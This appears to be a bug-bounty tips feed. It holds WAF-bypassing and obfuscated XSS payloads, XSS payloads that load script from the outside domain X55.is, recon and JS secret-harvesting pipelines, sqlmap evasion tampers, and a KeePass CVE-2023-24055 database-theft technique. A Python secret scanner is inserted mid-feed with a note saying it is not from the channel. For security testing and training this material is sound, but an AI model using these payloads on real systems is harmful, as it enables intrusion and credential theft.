Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
An XSS payload to bypass some WAFs and filters in Firefox
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
#infosec #cybersec #bugbountytips
Retrieves DNS records without any authentication
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Replace example.com with the target domain.
Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥
Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎
We also recommend checking out his website and Twitter for more tips:
👉 Site: 3rag.com
👉 Twitter: x.com/Chirag99Artani
Find sensitive files using Wayback
waybackurls 123.com | grep --color -E "\.xls|\.tar\.gz|\.bak|\.xml|\.xlsx|\.json|\.rar|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tgz|\.7z"
#bugbountytip #bugbounty #bugbountytips
An XSS payload with alert obfuscation, to bypass regex filters
<img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script>
#infosec #cybersec #bugbountytip
Improve your #XSS reports! 🔥
Use our https://X55.is ✨ domain
✅ Replacing alert(1)
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>
✅ As href/src attribute
<Base Href=//X55.is>
<Script Src=//X55.is>
🇷🇺 Zero-Day by AI: Google Claims World First As AI Finds 0-Day Security Vulnerability.
https://www.forbes.com/sites/daveywinder/2024/11/04/google-claims-world-first-as-ai-finds-0-day-security-vulnerability/
📌 Automated JavaScript Secret Detection
1 - Collect alive domains
docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services
2 - Collect JS files for analysis (getJS)
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
3 - Search for secrets in JS files
docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results
or you can use trufflehog instead of nuclei
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50
#bugbounty #bugbountytips
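The pipeline above hands the downloaded JS to nuclei or trufflehog for the actual secret matching. As an added example that is not from the channel or from either tool, the Python below shows the core of that matching step on a constructed JS bundle: a few vendor-prefix rules (a hypothetical subset; real scanners ship hundreds), a generic "secret-ish identifier = quoted literal" rule gated by length and Shannon entropy, and a placeholder filter so documentation keys such as AKIAIOSFODNN7EXAMPLE are not reported as live secrets. The sample bundle, rule set and thresholds are all assumptions; scan_dir is meant to be pointed at the httpx -srd response directory.

```python
import math
import os
import re
from collections import Counter

# Constructed sample JS bundle (not from any real site): one real-looking
# Google API key, the AWS documentation placeholder key, an obvious
# placeholder string, and a high-entropy value assigned to a *_secret name.
SAMPLE_JS = r"""
var cfg = { apiKey: "AIzaSyA1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q", env: "prod" };
const AWS_KEY = "AKIAIOSFODNN7EXAMPLE";
const secret_token = "YOUR_API_KEY_HERE";
const session_secret = "d8f1c2a9b7e4f6a0c3b5d9e1f2a4c6b8";
function ping() { return fetch("/api/ping?x=1"); }
"""

# Vendor-specific formats: fixed prefix plus fixed-length body, so a match is
# strong evidence on its own. Hypothetical subset for illustration.
SPECIFIC_RULES = {
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "google_api_key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),
    "github_pat": re.compile(r"ghp_[A-Za-z0-9]{36}"),
    "slack_token": re.compile(r"xox[abpr]-[0-9A-Za-z-]{10,}"),
}

# Generic rule: an identifier containing a secret-ish word assigned a quoted
# literal. Only kept when the literal is long and high-entropy (assumed
# thresholds) to cut false positives from labels and URLs.
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)\b[A-Za-z0-9_]*(?:api[_-]?key|secret|token|passw(?:or)?d)[A-Za-z0-9_]*"
    r"\s*[:=]\s*[\"']([^\"']{8,})[\"']"
)
GENERIC_MIN_LEN = 20
GENERIC_MIN_ENTROPY = 3.5  # bits per character

PLACEHOLDER_MARKERS = ("EXAMPLE", "YOUR_", "_HERE", "CHANGEME", "XXXX", "REPLACE")


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_placeholder(value):
    """True for documentation or template placeholders that are not live secrets."""
    upper = value.upper()
    return any(marker in upper for marker in PLACEHOLDER_MARKERS)


def _line_of(text, offset):
    return text.count("\n", 0, offset) + 1


def scan_js(text):
    """Return findings as dicts {rule, line, value} for one JS file's contents."""
    findings = []
    seen_values = set()
    # Specific rules first; a value they report is not reported again generically.
    for rule, pattern in SPECIFIC_RULES.items():
        for m in pattern.finditer(text):
            value = m.group(0)
            if looks_like_placeholder(value) or value in seen_values:
                continue
            seen_values.add(value)
            findings.append({"rule": rule, "line": _line_of(text, m.start()), "value": value})
    for m in GENERIC_ASSIGNMENT.finditer(text):
        value = m.group(1)
        if value in seen_values or looks_like_placeholder(value):
            continue
        if len(value) < GENERIC_MIN_LEN or shannon_entropy(value) < GENERIC_MIN_ENTROPY:
            continue
        seen_values.add(value)
        findings.append({"rule": "generic_assignment", "line": _line_of(text, m.start(1)), "value": value})
    findings.sort(key=lambda f: f["line"])
    return findings


def scan_dir(root):
    """Scan every file under root (e.g. the httpx -srd directory); return {path: findings}."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                found = scan_js(fh.read())
            if found:
                results[path] = found
    return results


if __name__ == "__main__":
    # On the constructed sample this reports the Google key (line 2) and the
    # high-entropy session_secret (line 5); both placeholders are suppressed.
    for f in scan_js(SAMPLE_JS):
        print(f"line {f['line']:>3}  {f['rule']:<20} {f['value'][:12]}...")
```

Whatever scanner you use, the point of the entropy gate and the placeholder list is the same: triage. A `YOUR_API_KEY_HERE` hit costs an analyst minutes, and a bundle of minified vendor JS can produce hundreds of such hits, so any hit that survives both filters is worth manual verification before it goes in a report.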
32 vulnerabilities in IBM Security Verify Access - IT Security Research by Pierre
https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
Template Engines Injection 101
https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
7 Tips for bug bounty beginners
https://blog.intigriti.com/hacking-tools/7-tips-for-bug-bounty-beginners
Easy logic bug that leaks the email for every user: https://medium.com/@banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5
😈 [ Diego Capriotti @naksyn ]
This has been one of my favorites for a while, but now it's time to let it go.
Here's my preferred way of getting the KeePass db that we often hunt for:
downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.
The target can remain clean and you can simply check for the dump creation.
KeePass version 2.53 can still open kdbx files created with version 2.57, and if a proper xml is used the user will likely notice nothing.
Update alerts can also be disabled within the xml.
🔗 https://gist.github.com/naksyn/6d5660dacd0730498a274b85d62a77e8
🐥 [ tweet ]
My new post sharing an investigation on a $243M theft from last month which led to multiple arrests and $9M+ frozen
https://x.com/zachxbt/status/1836752923830702392?
💉 Awesome Sqlmap Tampers.
• SQLMap Tamper List;
• space2comment.py;
• randomcase.py;
• between.py;
• charencode.py;
• equaltolike.py;
• appendnullbyte.py;
• base64encode.py;
• chardoubleencode.py;
• commalesslimit.py;
• halfversionedmorekeywords.py;
• modsecurityversioned.py;
• space2hash.py;
• overlongutf8.py;
• randomcomments.py;
• unionalltounion.py;
• versionedkeywords.py;
• space2dash.py;
• multiplespaces.py;
• nonrecursivereplacement.py;
• space2tab.py;
• lowercase.py;
• How to write Tamper Script for SQLMap.
#Sqlmap